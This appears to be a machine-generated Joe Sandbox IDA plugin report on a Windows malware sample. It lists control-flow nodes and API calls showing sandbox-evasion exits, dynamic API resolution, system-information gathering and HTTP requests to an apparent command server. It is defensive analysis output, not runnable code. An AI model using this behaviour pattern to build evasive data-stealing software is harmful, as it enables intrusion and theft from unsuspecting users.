26722 6c15a1 26719->26722 26720->26722 26721 6c1605 26724 6df1b0 lstrlen 26721->26724 26722->26721 26723 6c15fd lstrcpy 26722->26723 26723->26721 26725 6df1e4 26724->26725 26726 6df1eb lstrcpy 26725->26726 26727 6df1f7 lstrlen 26725->26727 26726->26727 26728 6df208 26727->26728 26729 6df20f lstrcpy 26728->26729 26730 6df21b lstrlen 26728->26730 26729->26730 26731 6df22c 26730->26731 26732 6df233 lstrcpy 26731->26732 26733 6df23f 26731->26733 26732->26733 26734 6df258 lstrcpy 26733->26734 26735 6df264 26733->26735 26734->26735 26736 6df286 lstrcpy 26735->26736 26737 6df292 26735->26737 26736->26737 26738 6df2ba lstrcpy 26737->26738 26739 6df2c6 26737->26739 26738->26739 26740 6df2ea lstrcpy 26739->26740 26778 6df300 26739->26778 26740->26778 26741 6df30c lstrlen 26741->26778 26742 6df4b9 lstrcpy 26742->26778 26743 6df3a1 lstrcpy 26743->26778 26744 6df3c5 lstrcpy 26744->26778 26745 6df4e8 lstrcpy 26806 6df4f0 26745->26806 26746 6c1530 8 API calls 26746->26806 26747 6dee90 28 API calls 26747->26778 26748 6defb0 35 API calls 26748->26806 26749 6df479 lstrcpy 26749->26778 26750 6df59c lstrcpy 26750->26806 26751 6df616 StrCmpCA 26752 6df70f StrCmpCA 26751->26752 26751->26806 26756 6dfe8e 26752->26756 26752->26778 26753 6dfa29 StrCmpCA 26762 6dfe2b 26753->26762 26753->26778 26754 6df73e lstrlen 26754->26778 26755 6dfead lstrlen 26770 6dfec7 26755->26770 26756->26755 26761 6dfea5 lstrcpy 26756->26761 26757 6dfd4d StrCmpCA 26759 6dfd60 Sleep 26757->26759 26767 6dfd75 26757->26767 26758 6df64a lstrcpy 26758->26806 26759->26778 26760 6dfa58 lstrlen 26760->26778 26761->26755 26763 6dfe4a lstrlen 26762->26763 26764 6dfe42 lstrcpy 26762->26764 26765 6dfe64 26763->26765 26764->26763 26777 6dfdce lstrlen 26765->26777 26779 6dfe7c lstrcpy 26765->26779 26766 6df89e lstrcpy 26766->26778 26768 6dfd94 lstrlen 26767->26768 26773 6dfd8c lstrcpy 26767->26773 26781 6dfdae 26768->26781 26769 6df76f lstrcpy 26769->26778 26771 6dfee7 lstrlen 26770->26771 26775 6dfedf lstrcpy 26770->26775 
26772 6dff01 26771->26772 26785 6dff21 26772->26785 26786 6dff19 lstrcpy 26772->26786 26773->26768 26774 6dfbb8 lstrcpy 26774->26778 26775->26771 26776 6dfa89 lstrcpy 26776->26778 26792 6dfde8 26777->26792 26778->26741 26778->26742 26778->26743 26778->26744 26778->26745 26778->26747 26778->26749 26778->26752 26778->26753 26778->26754 26778->26757 26778->26760 26778->26766 26778->26769 26778->26774 26778->26776 26780 6df791 lstrcpy 26778->26780 26783 6c1530 8 API calls 26778->26783 26784 6df8cd lstrcpy 26778->26784 26788 6dfaab lstrcpy 26778->26788 26791 6dfbe7 lstrcpy 26778->26791 26796 6df7e2 lstrcpy 26778->26796 26799 6dfafc lstrcpy 26778->26799 26778->26806 26779->26777 26780->26778 26781->26777 26790 6dfdc6 lstrcpy 26781->26790 26783->26778 26784->26806 26787 6c1610 4 API calls 26785->26787 26786->26785 26808 6dfe13 26787->26808 26788->26778 26789 6df698 lstrcpy 26789->26806 26790->26777 26791->26806 26793 6dfe08 26792->26793 26794 6dfe00 lstrcpy 26792->26794 26795 6c1610 4 API calls 26793->26795 26794->26793 26795->26808 26796->26778 26797 6df924 lstrcpy 26797->26806 26798 6df99e StrCmpCA 26798->26753 26798->26806 26799->26778 26800 6dfc3e lstrcpy 26800->26806 26801 6dfcb8 StrCmpCA 26801->26757 26801->26806 26802 6df9cb lstrcpy 26802->26806 26803 6dfce9 lstrcpy 26803->26806 26804 6dee90 28 API calls 26804->26806 26805 6dfa19 lstrcpy 26805->26806 26806->26746 26806->26748 26806->26750 26806->26751 26806->26753 26806->26757 26806->26758 26806->26778 26806->26789 26806->26797 26806->26798 26806->26800 26806->26801 26806->26802 26806->26803 26806->26804 26806->26805 26807 6dfd3a lstrcpy 26806->26807 26807->26806 26808->25832 26810 6e278c GetVolumeInformationA 26809->26810 26811 6e2785 26809->26811 26812 6e27ec GetProcessHeap RtlAllocateHeap 26810->26812 26811->26810 26814 6e2826 wsprintfA 26812->26814 26815 6e2822 26812->26815 26814->26815 27032 6e71e0 26815->27032 26819 6c4c70 26818->26819 26820 6c4c85 26819->26820 26821 6c4c7d lstrcpy 26819->26821 27036 6c4bc0 
26820->27036 26821->26820 26823 6c4c90 26824 6c4ccc lstrcpy 26823->26824 26825 6c4cd8 26823->26825 26824->26825 26826 6c4cff lstrcpy 26825->26826 26827 6c4d0b 26825->26827 26826->26827 26828 6c4d2f lstrcpy 26827->26828 26829 6c4d3b 26827->26829 26828->26829 26830 6c4d6d lstrcpy 26829->26830 26831 6c4d79 26829->26831 26830->26831 26832 6c4dac InternetOpenA StrCmpCA 26831->26832 26833 6c4da0 lstrcpy 26831->26833 26834 6c4de0 26832->26834 26833->26832 26835 6c54b8 InternetCloseHandle CryptStringToBinaryA 26834->26835 27040 6e3e70 26834->27040 26837 6c54e8 LocalAlloc 26835->26837 26852 6c55d8 26835->26852 26838 6c54ff CryptStringToBinaryA 26837->26838 26837->26852 26839 6c5529 lstrlen 26838->26839 26840 6c5517 LocalFree 26838->26840 26841 6c553d 26839->26841 26840->26852 26843 6c5557 lstrcpy 26841->26843 26844 6c5563 lstrlen 26841->26844 26842 6c4dfa 26845 6c4e23 lstrcpy lstrcat 26842->26845 26846 6c4e38 26842->26846 26843->26844 26848 6c557d 26844->26848 26845->26846 26847 6c4e5a lstrcpy 26846->26847 26849 6c4e62 26846->26849 26847->26849 26850 6c558f lstrcpy lstrcat 26848->26850 26851 6c55a2 26848->26851 26853 6c4e71 lstrlen 26849->26853 26850->26851 26854 6c55d1 26851->26854 26856 6c55c9 lstrcpy 26851->26856 26852->25861 26855 6c4e89 26853->26855 26854->26852 26857 6c4e95 lstrcpy lstrcat 26855->26857 26858 6c4eac 26855->26858 26856->26854 26857->26858 26859 6c4ed5 26858->26859 26860 6c4ecd lstrcpy 26858->26860 26861 6c4edc lstrlen 26859->26861 26860->26859 26862 6c4ef2 26861->26862 26863 6c4efe lstrcpy lstrcat 26862->26863 26864 6c4f15 26862->26864 26863->26864 26865 6c4f36 lstrcpy 26864->26865 26866 6c4f3e 26864->26866 26865->26866 26867 6c4f65 lstrcpy lstrcat 26866->26867 26868 6c4f7b 26866->26868 26867->26868 26869 6c4fa4 26868->26869 26870 6c4f9c lstrcpy 26868->26870 26871 6c4fab lstrlen 26869->26871 26870->26869 26872 6c4fc1 26871->26872 26873 6c4fcd lstrcpy lstrcat 26872->26873 26874 6c4fe4 26872->26874 26873->26874 26875 6c500d 26874->26875 26876 6c5005 
lstrcpy 26874->26876 26877 6c5014 lstrlen 26875->26877 26876->26875 26878 6c502a 26877->26878 26879 6c5036 lstrcpy lstrcat 26878->26879 26880 6c504d 26878->26880 26879->26880 26881 6c5079 26880->26881 26882 6c5071 lstrcpy 26880->26882 26883 6c5080 lstrlen 26881->26883 26882->26881 26884 6c509b 26883->26884 26885 6c50ac lstrcpy lstrcat 26884->26885 26886 6c50bc 26884->26886 26885->26886 26887 6c50da lstrcpy lstrcat 26886->26887 26888 6c50ed 26886->26888 26887->26888 26889 6c510b lstrcpy 26888->26889 26890 6c5113 26888->26890 26889->26890 26891 6c5121 InternetConnectA 26890->26891 26891->26835 26892 6c5150 HttpOpenRequestA 26891->26892 26893 6c518b 26892->26893 26894 6c54b1 InternetCloseHandle 26892->26894 27047 6e7310 lstrlen 26893->27047 26894->26835 26898 6c51a4 27055 6e72c0 26898->27055 26901 6e7280 lstrcpy 26902 6c51c0 26901->26902 26903 6e7310 3 API calls 26902->26903 26904 6c51d5 26903->26904 26905 6e7280 lstrcpy 26904->26905 26906 6c51de 26905->26906 26907 6e7310 3 API calls 26906->26907 26908 6c51f4 26907->26908 26909 6e7280 lstrcpy 26908->26909 26910 6c51fd 26909->26910 26911 6e7310 3 API calls 26910->26911 26912 6c5213 26911->26912 26913 6e7280 lstrcpy 26912->26913 26914 6c521c 26913->26914 26915 6e7310 3 API calls 26914->26915 26916 6c5231 26915->26916 26917 6e7280 lstrcpy 26916->26917 26918 6c523a 26917->26918 26919 6e72c0 2 API calls 26918->26919 26920 6c524d 26919->26920 26921 6e7280 lstrcpy 26920->26921 26922 6c5256 26921->26922 26923 6e7310 3 API calls 26922->26923 26924 6c526b 26923->26924 26925 6e7280 lstrcpy 26924->26925 26926 6c5274 26925->26926 26927 6e7310 3 API calls 26926->26927 26928 6c5289 26927->26928 26929 6e7280 lstrcpy 26928->26929 26930 6c5292 26929->26930 26931 6e72c0 2 API calls 26930->26931 26932 6c52a5 26931->26932 26933 6e7280 lstrcpy 26932->26933 26934 6c52ae 26933->26934 26935 6e7310 3 API calls 26934->26935 26936 6c52c3 26935->26936 26937 6e7280 lstrcpy 26936->26937 26938 6c52cc 26937->26938 26939 6e7310 3 API calls 
26938->26939 26940 6c52e2 26939->26940 26941 6e7280 lstrcpy 26940->26941 26942 6c52eb 26941->26942 26943 6e7310 3 API calls 26942->26943 26944 6c5301 26943->26944 26945 6e7280 lstrcpy 26944->26945 26946 6c530a 26945->26946 26947 6e7310 3 API calls 26946->26947 26948 6c531f 26947->26948 26949 6e7280 lstrcpy 26948->26949 26950 6c5328 26949->26950 26951 6e72c0 2 API calls 26950->26951 26952 6c533b 26951->26952 26953 6e7280 lstrcpy 26952->26953 26954 6c5344 26953->26954 26955 6c537c 26954->26955 26956 6c5370 lstrcpy 26954->26956 26957 6e72c0 2 API calls 26955->26957 26956->26955 26958 6c538a 26957->26958 26959 6e72c0 2 API calls 26958->26959 26960 6c5397 26959->26960 26961 6e7280 lstrcpy 26960->26961 26962 6c53a1 26961->26962 26963 6c53b1 lstrlen lstrlen HttpSendRequestA InternetReadFile 26962->26963 26964 6c549c InternetCloseHandle 26963->26964 26968 6c53f2 26963->26968 26966 6c54ae 26964->26966 26965 6c53fd lstrlen 26965->26968 26966->26894 26967 6c542e lstrcpy lstrcat 26967->26968 26968->26964 26968->26965 26968->26967 26969 6c5473 26968->26969 26970 6c546b lstrcpy 26968->26970 26971 6c547a InternetReadFile 26969->26971 26970->26969 26971->26964 26971->26968 26973 6d8cc6 ExitProcess 26972->26973 26988 6d8ccd 26972->26988 26974 6d8ee2 26974->25863 26975 6d8e6f StrCmpCA 26975->26988 26976 6d8e88 lstrlen 26976->26988 26977 6d8d84 StrCmpCA 26977->26988 26978 6d8da4 StrCmpCA 26978->26988 26979 6d8d06 lstrlen 26979->26988 26980 6d8dbd StrCmpCA 26980->26988 26981 6d8ddd StrCmpCA 26981->26988 26982 6d8dfd StrCmpCA 26982->26988 26983 6d8e1d StrCmpCA 26983->26988 26984 6d8e3d StrCmpCA 26984->26988 26985 6d8d5a lstrlen 26985->26988 26986 6d8e56 StrCmpCA 26986->26988 26987 6d8d30 lstrlen 26987->26988 26988->26974 26988->26975 26988->26976 26988->26977 26988->26978 26988->26979 26988->26980 26988->26981 26988->26982 26988->26983 26988->26984 26988->26985 26988->26986 26988->26987 26989 6d8ebb lstrcpy 26988->26989 26989->26988 26990->25869 26991->25871 26992->25877 26993->25879 
26994->25885 26995->25887 26996->25893 26997->25897 26998->25903 26999->25905 27000->25909 27001->25923 27002->25927 27003->25926 27004->25922 27005->25926 27006->25944 27007->25929 27008->25930 27009->25934 27010->25940 27011->25941 27012->25947 27013->25954 27014->25956 27015->25980 27016->25984 27017->25983 27018->25979 27019->25983 27020->25993 27023 6c161f 27022->27023 27024 6c162b lstrcpy 27023->27024 27025 6c1633 27023->27025 27024->27025 27026 6c164d lstrcpy 27025->27026 27027 6c1655 27025->27027 27026->27027 27028 6c166f lstrcpy 27027->27028 27030 6c1677 27027->27030 27028->27030 27029 6c1699 27029->26715 27030->27029 27031 6c1691 lstrcpy 27030->27031 27031->27029 27033 6e71e6 27032->27033 27034 6e71fc lstrcpy 27033->27034 27035 6e2860 27033->27035 27034->27035 27035->25858 27037 6c4bd0 27036->27037 27037->27037 27038 6c4bd7 ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI lstrlen InternetCrackUrlA 27037->27038 27039 6c4c41 27038->27039 27039->26823 27041 6e3e83 27040->27041 27042 6e3e9f lstrcpy 27041->27042 27043 6e3eab 27041->27043 27042->27043 27044 6e3ecd lstrcpy 27043->27044 27045 6e3ed5 GetSystemTime 27043->27045 27044->27045 27046 6e3ef3 27045->27046 27046->26842 27049 6e732d 27047->27049 27048 6c519b 27051 6e7280 27048->27051 27049->27048 27050 6e733d lstrcpy lstrcat 27049->27050 27050->27048 27052 6e728c 27051->27052 27053 6e72b4 27052->27053 27054 6e72ac lstrcpy 27052->27054 27053->26898 27054->27053 27057 6e72dc 27055->27057 27056 6c51b7 27056->26901 27057->27056 27058 6e72ed lstrcpy lstrcat 27057->27058 27058->27056 27087 6e31f0 GetSystemInfo wsprintfA 27063 6e8471 120 API calls 2 library calls 27064 6de049 147 API calls 27116 6d8615 48 API calls 27104 6d8615 49 API calls 27071 6e3cc0 GetProcessHeap RtlAllocateHeap wsprintfA lstrcpy 27117 6e33c0 GetProcessHeap RtlAllocateHeap GlobalMemoryStatusEx wsprintfA 27083 6d3959 244 API calls 27088 6d01d9 126 API calls 27066 6e2853 lstrcpy 27072 6e2cd0 GetUserDefaultLocaleName LocalAlloc CharToOemW 27106 6d4b29 303 API 
calls 27118 6d23a9 298 API calls 27073 6e30a0 GetSystemPowerStatus 27089 6e29a0 GetCurrentProcess IsWow64Process 27093 6cf639 144 API calls 27096 6c16b9 200 API calls 27108 6cbf39 177 API calls 27085 6e3130 GetProcessHeap RtlAllocateHeap RegOpenKeyExA RegQueryValueExA RegCloseKey 27119 6dabb2 120 API calls 27074 6d8c88 16 API calls 27110 6cb309 98 API calls 27075 6e2880 10 API calls 27076 6e4480 OpenProcess GetModuleFileNameExA CloseHandle lstrcpy 27077 6e3480 6 API calls 27097 6e3280 7 API calls 27111 6c7702 free ctype 27078 6e749e 5 API calls ctype 27080 6d2499 290 API calls 27120 6cdb99 671 API calls 27068 6e8819 free free free __getptd 27121 6d8615 47 API calls 27086 6e4e35 7 API calls 27069 6e2c10 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation wsprintfA 27113 6e9711 128 API calls __setmbcp
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 006C4C7F
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006C4CD2
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006C4D05
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006C4D35
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006C4D73
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006C4DA6
                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 006C4DB6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$InternetOpen
                                • String ID: "$------
                                • API String ID: 2041821634-2370822465
                                • Opcode ID: bf85ab55343be3e6aeba5116c3f5ef053374954e8310aee19d07caea1e301c4c
                                • Instruction ID: 1f31feb3414561d2179fa57e26ce0e2d8520b5394bde7dba0869359fc6d029b7
                                • Opcode Fuzzy Hash: bf85ab55343be3e6aeba5116c3f5ef053374954e8310aee19d07caea1e301c4c
                                • Instruction Fuzzy Hash: 8A5245719016169BCB61EBA5DC59FBE7BBAEF44310F04402CE90AAB251DF34ED42CB94

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2125 6e6390-6e63bd GetPEB 2126 6e65c3-6e6623 LoadLibraryA * 5 2125->2126 2127 6e63c3-6e65be call 6e62f0 GetProcAddress * 20 2125->2127 2129 6e6638-6e663f 2126->2129 2130 6e6625-6e6633 GetProcAddress 2126->2130 2127->2126 2132 6e666c-6e6673 2129->2132 2133 6e6641-6e6667 GetProcAddress * 2 2129->2133 2130->2129 2134 6e6688-6e668f 2132->2134 2135 6e6675-6e6683 GetProcAddress 2132->2135 2133->2132 2137 6e66a4-6e66ab 2134->2137 2138 6e6691-6e669f GetProcAddress 2134->2138 2135->2134 2139 6e66ad-6e66d2 GetProcAddress * 2 2137->2139 2140 6e66d7-6e66da 2137->2140 2138->2137 2139->2140
                                APIs
                                • GetProcAddress.KERNEL32(76210000,00F115C8), ref: 006E63E9
                                • GetProcAddress.KERNEL32(76210000,00F116D0), ref: 006E6402
                                • GetProcAddress.KERNEL32(76210000,00F11568), ref: 006E641A
                                • GetProcAddress.KERNEL32(76210000,00F11700), ref: 006E6432
                                • GetProcAddress.KERNEL32(76210000,00F18B40), ref: 006E644B
                                • GetProcAddress.KERNEL32(76210000,00F05490), ref: 006E6463
                                • GetProcAddress.KERNEL32(76210000,00F05510), ref: 006E647B
                                • GetProcAddress.KERNEL32(76210000,00F116A0), ref: 006E6494
                                • GetProcAddress.KERNEL32(76210000,00F11550), ref: 006E64AC
                                • GetProcAddress.KERNEL32(76210000,00F11598), ref: 006E64C4
                                • GetProcAddress.KERNEL32(76210000,00F116B8), ref: 006E64DD
                                • GetProcAddress.KERNEL32(76210000,00F05590), ref: 006E64F5
                                • GetProcAddress.KERNEL32(76210000,00F11748), ref: 006E650D
                                • GetProcAddress.KERNEL32(76210000,00F117D8), ref: 006E6526
                                • GetProcAddress.KERNEL32(76210000,00F053B0), ref: 006E653E
                                • GetProcAddress.KERNEL32(76210000,00F114F0), ref: 006E6556
                                • GetProcAddress.KERNEL32(76210000,00F11790), ref: 006E656F
                                • GetProcAddress.KERNEL32(76210000,00F05530), ref: 006E6587
                                • GetProcAddress.KERNEL32(76210000,00F11868), ref: 006E659F
                                • GetProcAddress.KERNEL32(76210000,00F05470), ref: 006E65B8
                                • LoadLibraryA.KERNEL32(00F117F0,?,?,?,006E1C03), ref: 006E65C9
                                • LoadLibraryA.KERNEL32(00F11880,?,?,?,006E1C03), ref: 006E65DB
                                • LoadLibraryA.KERNEL32(00F11850,?,?,?,006E1C03), ref: 006E65ED
                                • LoadLibraryA.KERNEL32(00F11820,?,?,?,006E1C03), ref: 006E65FE
                                • LoadLibraryA.KERNEL32(00F11898,?,?,?,006E1C03), ref: 006E6610
                                • GetProcAddress.KERNEL32(75B30000,00F11808), ref: 006E662D
                                • GetProcAddress.KERNEL32(751E0000,00F118B0), ref: 006E6649
                                • GetProcAddress.KERNEL32(751E0000,00F11838), ref: 006E6661
                                • GetProcAddress.KERNEL32(76910000,00F18E68), ref: 006E667D
                                • GetProcAddress.KERNEL32(75670000,00F055B0), ref: 006E6699
                                • GetProcAddress.KERNEL32(77310000,00F18BC0), ref: 006E66B5
                                • GetProcAddress.KERNEL32(77310000,NtQueryInformationProcess), ref: 006E66CC
                                Strings
                                • NtQueryInformationProcess, xrefs: 006E66C1
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: NtQueryInformationProcess
                                • API String ID: 2238633743-2781105232
                                • Opcode ID: 58d5622fc37db532ec582723a8f87dca5cf70c010403d4f75608452645bf2121
                                • Instruction ID: 9f187ac28794306f93721ce8209273a48d669d0a9219282f4fd6507804df72ab
                                • Opcode Fuzzy Hash: 58d5622fc37db532ec582723a8f87dca5cf70c010403d4f75608452645bf2121
                                • Instruction Fuzzy Hash: D3A129B5A11A00EFD754DF79ED88F363BB9FB88741300851AE99683364EE74A840DF64

                                 Control-flow Graph (rendered graph not recoverable from text)
                                APIs
                                  • Part of subcall function 006E6390: GetProcAddress.KERNEL32(76210000,00F115C8), ref: 006E63E9
                                  • Part of subcall function 006E6390: GetProcAddress.KERNEL32(76210000,00F116D0), ref: 006E6402
                                  • Part of subcall function 006E6390: GetProcAddress.KERNEL32(76210000,00F11568), ref: 006E641A
                                  • Part of subcall function 006E6390: GetProcAddress.KERNEL32(76210000,00F11700), ref: 006E6432
                                  • Part of subcall function 006E6390: GetProcAddress.KERNEL32(76210000,00F18B40), ref: 006E644B
                                  • Part of subcall function 006E6390: GetProcAddress.KERNEL32(76210000,00F05490), ref: 006E6463
                                  • Part of subcall function 006E6390: GetProcAddress.KERNEL32(76210000,00F05510), ref: 006E647B
                                  • Part of subcall function 006E6390: GetProcAddress.KERNEL32(76210000,00F116A0), ref: 006E6494
                                  • Part of subcall function 006E6390: GetProcAddress.KERNEL32(76210000,00F11550), ref: 006E64AC
                                  • Part of subcall function 006E6390: GetProcAddress.KERNEL32(76210000,00F11598), ref: 006E64C4
                                  • Part of subcall function 006E6390: GetProcAddress.KERNEL32(76210000,00F116B8), ref: 006E64DD
                                  • Part of subcall function 006E6390: GetProcAddress.KERNEL32(76210000,00F05590), ref: 006E64F5
                                  • Part of subcall function 006E6390: GetProcAddress.KERNEL32(76210000,00F11748), ref: 006E650D
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006E1C2F
                                • ExitProcess.KERNEL32 ref: 006E1C67
                                • GetSystemInfo.KERNEL32(?), ref: 006E1C71
                                • ExitProcess.KERNEL32 ref: 006E1C7F
                                  • Part of subcall function 006C1030: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 006C1046
                                  • Part of subcall function 006C1030: VirtualAllocExNuma.KERNEL32(00000000), ref: 006C104D
                                  • Part of subcall function 006C1030: ExitProcess.KERNEL32 ref: 006C1058
                                  • Part of subcall function 006C10C0: GlobalMemoryStatusEx.KERNEL32 ref: 006C10EA
                                  • Part of subcall function 006C10C0: ExitProcess.KERNEL32 ref: 006C1114
                                • GetUserDefaultLangID.KERNEL32 ref: 006E1C8F
                                • ExitProcess.KERNEL32 ref: 006E1CB2
                                • ExitProcess.KERNEL32 ref: 006E1CE1
                                • lstrlen.KERNEL32(00F18AB0), ref: 006E1CEE
                                • lstrcpy.KERNEL32(00000000,?), ref: 006E1D15
                                • lstrcat.KERNEL32(00000000,00F18AB0), ref: 006E1D1D
                                • lstrlen.KERNEL32(006F4B98), ref: 006E1D28
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006E1D48
                                • lstrcat.KERNEL32(00000000,006F4B98), ref: 006E1D54
                                • lstrlen.KERNEL32(00000000), ref: 006E1D63
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006E1D89
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006E1D94
                                • lstrlen.KERNEL32(006F4B98), ref: 006E1D9F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006E1DBC
                                • lstrcat.KERNEL32(00000000,006F4B98), ref: 006E1DC8
                                • lstrlen.KERNEL32(00000000), ref: 006E1DD7
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006E1DF9
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006E1E04
                                Yara matches
                                Similarity
                                • API ID: AddressProc$Process$Exitlstrcpy$lstrcatlstrlen$AllocCurrentDefaultGlobalInfoLangMemoryNumaStatusSystemUserVirtual
                                • String ID:
                                • API String ID: 3366406952-0
                                • Opcode ID: 2123d10746916c721500707c4b599efdaaa8b1ba700080b52bebda8a88c0fa47
                                • Instruction ID: 1d119da48a334975586c749ce4ed87d872267f1cacb7d77cec2a5f252672e511
                                • Opcode Fuzzy Hash: 2123d10746916c721500707c4b599efdaaa8b1ba700080b52bebda8a88c0fa47
                                • Instruction Fuzzy Hash: CB716D31502756ABDB60ABB2DC49FBE3A7BFF41701F144028F9469B291DF749801DB64

                                 Control-flow Graph (rendered graph not recoverable from text)
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 006C6C6F
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006C6CC2
                                • InternetOpenA.WININET(006ECFEC,00000001,00000000,00000000,00000000), ref: 006C6CD5
                                • StrCmpCA.SHLWAPI(?,00F20BB8), ref: 006C6CED
                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 006C6D15
                                • HttpOpenRequestA.WININET(00000000,GET,?,00F205E0,00000000,00000000,-00400100,00000000), ref: 006C6D50
                                • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 006C6D77
                                • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006C6D86
                                • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 006C6DA5
                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 006C6DFF
                                • lstrcpy.KERNEL32(00000000,?), ref: 006C6E5B
                                • InternetReadFile.WININET(?,00000000,000007CF,?), ref: 006C6E7D
                                • InternetCloseHandle.WININET(00000000), ref: 006C6E8E
                                • InternetCloseHandle.WININET(?), ref: 006C6E98
                                • InternetCloseHandle.WININET(00000000), ref: 006C6EA2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C6EC3
                                Strings
                                Yara matches
                                Similarity
                                • API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequest$ConnectInfoOptionQuerySend
                                • String ID: ERROR$GET
                                • API String ID: 3687753495-3591763792
                                • Opcode ID: 58521f31a712c021ab548ec67b9d27ab76439fc7f91ad7d30651ec27b859f511
                                • Instruction ID: cec8e4ead9ef593eb62d94f31bbe87546b804e5dfe1d7ef0ada3f3f0cf1d9e7d
                                • Opcode Fuzzy Hash: 58521f31a712c021ab548ec67b9d27ab76439fc7f91ad7d30651ec27b859f511
                                • Instruction Fuzzy Hash: 88816C71A0121AABDB20DFA5DC49FFE77BAEF48700F14406DF949E7280DB70A9458B94

                                 Control-flow Graph (rendered graph not recoverable from text)
                                APIs
                                • RtlAllocateHeap.NTDLL(00000000), ref: 006C4AA2
                                • VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 006C4BB0
                                Strings
                                Yara matches
                                Similarity
                                • API ID: AllocateHeapProtectVirtual
                                • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                • API String ID: 1542196881-3329630956
                                • Opcode ID: 910793246775f96d9d179f0d530787c4dd868347895947cdecb40da5659dc617
